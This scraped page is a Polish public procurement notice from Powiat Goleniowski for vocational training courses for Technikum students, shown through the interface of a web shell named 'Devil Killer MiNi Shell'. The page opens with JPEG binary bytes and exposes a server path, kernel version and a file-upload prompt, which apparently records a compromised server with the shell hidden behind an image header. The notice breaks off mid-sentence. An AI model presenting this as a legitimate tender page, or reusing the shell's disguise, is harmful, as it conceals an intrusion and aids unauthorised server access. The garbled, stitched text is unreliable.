JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250507/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250507/0021924501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Specjalistyczne, branżowe szkolenia dla uczniów dające kwalifikacje zawodowe”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Goleniowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684120</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Goleniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wrip@powiat-goleniowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat-goleniowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Specjalistyczne, branżowe szkolenia dla uczniów dające kwalifikacje zawodowe”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-783aaa73-90cc-4412-82ad-a00add3dab0d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00219245</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00017525/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Specjalistyczne, branżowe szkolenia dla uczniów dające kwalifikacje zawodowe.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie realizowane jest w ramach projektu „Wzrost atrakcyjności kształcenia zawodowego – kompleksowy program wsparcia uczniów”, który jest dofinansowany w ramach programu Fundusze Europejskie na rzecz Pomorza Zachodniego 2021 – 2027, współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus, Działanie 6.10. Edukacja zawodowa. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/sp_goleniow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/sp_goleniow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem<br/>https://platformazakupowa.pl/sp_goleniow<br/>3. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami,<br/>w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl<br/>i formularza „Wyślij wiadomość do zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający będzie przekazywał wykonawcom informacje<br/>w formie elektronicznej za pośrednictwem platformazakupowa.pl Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji,<br/>zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja,<br/>której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl<br/>do konkretnego wykonawcy.<br/>4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów<br/>i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec<br/>awarii lub powiadomienie może trafić do folderu SPAM.<br/>5. Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIE PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia,<br/>formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem<br/>platformazakupowa.pl tj.:<br/>a. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 4 GB Ram, procesor Intel i3 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 10, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c. zainstalowana dowolna przeglądarka internetowa, w przypadku Microsoft Edge,<br/>d. włączona obsługa JavaScript,<br/>e. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f. Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem www.powiat-goleniowski.pl<br/>w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny<br/>z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed<br/>upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym<br/>postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>8. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące<br/>w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w<br/>niniejszym postępowaniu</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/sp_goleniow</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Powiat Goleniowski z siedzibą<br/>w Starostwie Powiatowym w Goleniowie przy ul. Dworcowej 1, 72-100 Goleniów.<br/>2) administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować pod adresem e-mail: iod@powiatgoleniowski.<br/>pl, Inspektor Ochrony Danych (IOD)<br/>w Starostwie tel./fax 91 4072568<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu<br/>nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy PZP<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy PZP, związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania,<br/>w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WPW.272.02.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> OPIS PRZEDMIOTU ZAMÓWIENIA – Część I <br/>1. Informacje ogólne: <br/>Szkolenie realizowane jest w ramach projektu:<br/>„Wzrost atrakcyjności kształcenia zawodowego – kompleksowy program wsparcia uczniów”, współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus w ramach programu Fundusze Europejskie na rzecz Pomorza Zachodniego 2021–2027, działanie 6.10. Edukacja zawodowa. <br/><br/>Celem zamówienia jest organizacja kursów zawodowych dla uczniów Technikum nr 1 <br/>w Goleniowie, mających na celu nabycie kwalifikacji zawodowych potwierdzonych egzaminem sprawdzającym.<br/><br/>2.	Kursy zawodowe: <br/>2.1.	Kurs Kelnerski: <br/>Cel kursu: Nabycie praktycznych umiejętności z zakresu obsługi konsumenta, serwowania potraw i napojów, dekorowania stołów oraz organizacji przyjęć. <br/><br/>-	Liczba uczestników: <br/>b)	Rok szkolny 2025/2026 - 8 grup po 10 osób (40 osób);<br/>c)	Rok szkolny 2026/2027 - 2 grupy po 10 osób (20 osób). <br/>-	Czas trwania: 40 godzin na grupę. <br/>-	Zakres tematyczny: <br/>a)	organizacja i technika obsługi konsumenta <br/>b)	profesjonalne serwowanie potraw i napojów, <br/>c)	dekorowanie stołów, <br/>d)	obsługa nowoczesnych urządzeń gastronomicznych. <br/>- liczba godzin kursu nie obejmuje egzaminu przeprowadzonego przez Izbę Rzemieślniczą.<br/>2.2. Kurs cukierniczy: <br/>Cel kursu: <br/>Nabicie umiejętności wypiekania, dekorowania i przygotowania wyrobów cukierniczych zgodnie z nowoczesnymi standardami. <br/>-	Liczba uczestników: <br/>a)	Rok szkolny 2025/2026 – 5 grup po 10 osób (50 osób);<br/>b)	Rok szkolny 2026/2027 - 5 grup po 10 osób (50 osób). <br/>-	Czas trwania: 40 godzin na grupę.<br/>-	Zakres tematyczny:<br/>a)	wypiekanie ciast i ciasteczek<br/>b)	sporządzanie półproduktów cukierniczych, <br/>c)	dekorowanie wyrobów, <br/>d)	zasady higieny i bezpieczeństwa w pracy cukiernika.<br/>- liczba godzin kursu nie obejmuje egzaminu przeprowadzonego przez Izbę Rzemieślniczą. <br/>2.3.	Kurs mechanika pojazdów samochodowych:<br/>Cel kursu: <br/>Przygotowanie uczniów do wykonywania zawodu mechanika samochodowego.<br/>-	Liczba uczestników:<br/>b)	Rok szkolny 2025/2026 – 4 grupy po 10 osób (20 osób),<br/>c)	Rok szkolny 2026/2027 – 3 grupy po 10 osób (30 osób).<br/>-	Czas trwania: 40 godzin na grupę.<br/>-	Zakres tematyczny:<br/>a)	posługiwanie się dokumentacją techniczną, <br/>b)	diagnostyka zawieszenia, <br/>c)	wymiana materiałów eksploatacyjnych, <br/>d)	podstawowe naprawy pojazdów.<br/>- liczba godzin kursu nie obejmuje egzaminu przeprowadzonego przez Izbę Rzemieślniczą.<br/>3.	Terminy realizacji kursów: <br/>1) Kurs kelnerski:<br/>- 10.09. – 20.12.2025 : 2 grupy po 10 osób (20 osób),<br/>- 10.01. – 30.05.2026: 3 grupy po 10 osób (30 osób),<br/>- 10.09. – 20.12.2026: 2 grupy po 10 osób (20 osób),<br/>- 10.01. – 30.05.2027: 3 grupy po 10 osób (30 osób).<br/>2) Kurs cukierniczy:<br/>- 10.09. – 20.12.2025 : 2 grupy po 10 osób (20 osób)<br/>- 10.01. – 30.05.2026: 2 grupy po 10 osób (20 osób)<br/>- 10.09. – 20.12.2026: 1 grupa po 10 osób (10 osób)<br/>- 10.01. – 30.05.2027: 2 grupy po 10 osób (20 osób)<br/>3) Kurs mechanika pojazdów samochodowych:<br/>- 10.09. – 20.12.2025 : 2 grupy po 10 osób (20 osób),<br/>- 10.01. – 30.05.2026: 2 grupy po 10 osób (20 osób),<br/>- 10.09. – 20.12.2026: 1 grupa po 10 osób (10 osób),<br/>- 10.01. – 30.05.2027: 2 grupy po 10 osób (20 osób).<br/><br/>WYMAGANIA: <br/>-	Wykonawca zobowiązany jest do zapewnienia na własny koszt wszelkich materiałów zużywalnych oraz produktów niezbędnych do prawidłowej realizacji zajęć praktycznych w ramach kursów. Wszystkie materiały i produkty muszą być pełnowartościowe, spełniające obowiązujące normy jakości i bezpieczeństwa oraz dostosowane do rodzaju prowadzonego szkolenia. <br/>-	Wykonawca zobowiązany jest do zapewnienia niezbędnego sprzętu do realizacji zajęć praktycznych w ramach kursów, w tym również sprzętu specjalistycznego, odpowiedniego do charakteru danego szkolenia. <br/>-	Sprzęt musi być w pełni sprawny technicznie, bezpieczny w użytkowaniu, spełniający obowiązujące normy BHP oraz dostosowany do poziomu kształcenia uczestników. <br/>-	Wykonawca zobowiązany jest do realizacji kursów w siedzibie Zespołu Szkół nr 1 w Goleniowie; <br/>-	Wykonawca zobowiązany jest do zapewnienia odpowiednio wykwalifikowanej kadry szkoleniowej, posiadającej doświadczenie zawodowe oraz przygotowanie dydaktyczne adekwatne do rodzaju prowadzonych kursów. W przypadku szkoleń zawodowych preferowane jest, aby zajęcia prowadzone były przez osoby posiadające tytuł mistrza w zawodzie, potwierdzony stosownym certyfikatem wydanym przez Izbę Rzemieślniczą lub inną uprawnioną instytucję.<br/>-	Wykonawca zobowiązany jest do przeprowadzenia egzaminów sprawdzających umiejętności zawodowe uczestników kursów: kelnerskiego, cukierniczego oraz mechaników pojazdów samochodowych. Egzaminy te mają na celu potwierdzenie nabytych kwalifikacji i powinny być zgodne z obowiązującymi standardami.<br/>-	Wszelkie koszty związane z organizacją i przeprowadzeniem egzaminów pokrywa Wykonawca. <br/>-	Wykonawca zobowiązuje się do przeprowadzenia egzaminu sprawdzającego przez Izbę Rzemieślniczą. <br/>-	Wykonawca zobowiązany jest do dokumentacji przebiegu szkolenia, np. poprzez: listy obecności, harmonogram zajęć, wyniki egzaminacyjne – w tym poświadczenia i certyfikaty uczniów, którzy uczestniczyli w egzaminie, ankiety ewaluacyjne potwierdzające jakość szkolenia. <br/>-	Wykonawca ponosi odpowiedzialność za zapewnienie ubezpieczenia uczestników kursów od następstw nieszczęśliwych wypadków na czas trwania szkolenia i egzaminów. <br/>-	Wykonawca zobowiązany jest do przedłożenia aktualnego zaświadczenia o niekaralności osób wyznaczonych do prowadzenia szkoleń, wystawionego nie wcześniej niż 3 miesiące przed dniem złożenia oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osoby na umowę o pracę (art. 95 PZP)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> OPIS PRZEDMIOTU ZAMÓWIENIA – Część II<br/>1. Informacje ogólne: <br/>Szkolenie realizowane jest w ramach projektu:<br/>„Wzrost atrakcyjności kształcenia zawodowego – kompleksowy program wsparcia uczniów”, 